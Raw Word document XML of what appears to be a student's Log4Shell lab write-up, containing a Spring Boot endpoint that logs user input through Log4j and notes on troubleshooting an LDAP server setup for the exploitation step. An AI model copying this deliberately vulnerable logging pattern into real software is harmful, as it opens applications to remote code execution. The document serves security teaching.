      </w:r>
    </w:p>
    <w:p w14:paraId="15D6FE07"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p>
    <w:p w14:paraId="73DC0AD0"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private static final Logger logger = LogManager.getLogger(DemoApplication.class);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B97B736"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p>
    <w:p w14:paraId="665C70F3"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03660E6C"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SpringApplication.run(DemoApplication.class, args);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D43E72C"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31088E0D"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p>
    <w:p w14:paraId="303E675C"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@GetMapping("/")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650FF7B5"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public String index(@RequestParam(name = "input", required = false, defaultValue = "") String input) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309EB8F1"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logger.info("User input: " + input);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5429B564"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return "Input received. Check logs.";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F208DE0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEFAE53"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B861995"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b/>
          <w:bCs/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BB74088" w14:textId="6C59E365"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b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Step 2: Exploit the Vulnerability (MITRE ATT&amp;CK)  Task: Exploit Log4Shell by sending a malicious payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5042BD48" w14:textId="77777777" w:rsidR="00E36C5C" w:rsidRPr="009F01AC" w:rsidRDefault="00E36C5C" w:rsidP="00E36C5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kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="404F96CD" w14:textId="7A465260" w:rsidR="00E36C5C" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="006A5C0D">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The instructions did not work and when </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>trying to install python and ldap 3, used command pip install ldap3 but I get error -bash: pip: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D81CF15" w14:textId="287F1419" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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 xml:space="preserve">So I had to do the below: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B167B7D" w14:textId="18A0C03B" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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sudo dnf install python3 -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FA1AE1" w14:textId="0393682C" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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Python 3.9.22</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> installed </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B83DB8A" w14:textId="28B02CBA" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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 xml:space="preserve">Installed pip - </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>sudo dnf install python3-pip -y</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="574C9B6F" w14:textId="6D736A1D" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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pip 21.3.1 from /usr/lib/python3.9/site-packages/pip (python 3.9)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E101A4A" w14:textId="59E2BD4D" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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 xml:space="preserve">Installed ldap library </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pip3 install ldap3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EBF247D" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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python3 -m venv venv</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E7A894" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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source venv/bin/activate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10E9CF77" w14:textId="733AEF15" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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pip install ldap3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21FEB807" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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p>
    <w:p w14:paraId="44769D4D" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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 xml:space="preserve">All installed ! </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6538DA81" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D"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4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="079AD642" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="009E0422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>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setting up a working LDAP server using Docker and test it with a Python client script using ldap3.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C157EBA" w14:textId="0B4FF6AF" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="009E0422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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 xml:space="preserve">Creating ldap_server.py file. </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">The code does not work.ldap 3 does not provide ldap server implementation – it is a client library. Also </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">connection.serve_forever() </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>does not exist</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> in ldap3.</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Had to do this differently. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4282C29C" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3FD5AEEC" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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840" w:firstLine="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Used code below for the file: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72382642" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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4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from ldap3 import Server, Connection, ALL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F20B5D9" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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40"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54ED3A0B" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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4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Connect to an LDAP server running at 0.0.0.0:389</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD8ADB6" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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4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server = Server('0.0.0.0', port=389, get_info=ALL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328CE04E" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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40"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6185EB39" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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4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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699DD035" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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4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lastRenderedPageBreak/>
        <w:t xml:space="preserve">    connection = Connection(server, auto_bind=True)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66496DAC" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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4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print("Connected to LDAP server at 0.0.0.0:389")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A015952" w14:textId="77777777" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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4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except Exception as e:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41F7F47F" w14:textId="10CC5F9B" w:rsidR="006A5C0D" w:rsidRPr="009F01AC" w:rsidRDefault="006A5C0D" w:rsidP="00CA02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40"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(f"Failed to connect to LDAP server: {e}")</w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="A02B93" w:themeColor="accent5"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B548FD" w14:textId="2ADC9ACF" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA02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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">File created ldap_test.py </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29D89693" w14:textId="77777777" w:rsidR="009E0422" w:rsidRPr="009F01AC" w:rsidRDefault="009E0422" w:rsidP="00CA02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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1B170E60" w14:textId="72263798" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="009E0422">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="4EA72E" w:themeColor="accent6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Running the script- </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">When I try to run I get error </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E61E5F" w14:textId="2D5E70B8" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(venv) [ec2-user@ip-172-31-46-85 log4shell-homework]$ python3 ldap_test.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C27EC78" w14:textId="77777777" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Failed to connect to LDAP server: socket connection error while opening: [Errno 111] Connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FC57DE" w14:textId="42A775C9" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(venv) [ec2-user@ip-172-31-46-85 log4shell-homework]$</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73642618" w14:textId="77777777" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D3905D" w14:textId="2BDD64B7" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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 xml:space="preserve">Confirmed open LDAP container is running </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DBE4765" w14:textId="23067C90" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Tested connection from EC2 to LDAP container – error command not found. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CDD2642" w14:textId="31947C87" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Installed telnet </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB70201" w14:textId="0DFF40BF" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t>Tried to connect – connection refused</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A189FE" w14:textId="227057CB" w:rsidR="00CA0277" w:rsidRPr="009F01AC" w:rsidRDefault="00CA0277" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00E11CD5" w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Checked docker container and port shows empty </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476684BC" w14:textId="3FFB7413" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00CA0277">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
        <w:t xml:space="preserve">Ran below to start openldap with port mapping </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E738D03" w14:textId="77777777" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD5">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>docker run -d --name my-openldap \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11F58C9A" w14:textId="3C8472ED" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD5">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EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p 389:389 \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="141FA1A0" w14:textId="77777777" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD5">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920"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -e LDAP_ORGANISATION="My Org" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C883B03" w14:textId="77777777" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD5">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920"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F01AC">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="EE0000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  -e LDAP_DOMAIN="example.com" \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="314CAB4C" w14:textId="77777777" w:rsidR="00E11CD5" w:rsidRPr="009F01AC" w:rsidRDefault="00E11CD5" w:rsidP="00E11CD5">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920"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
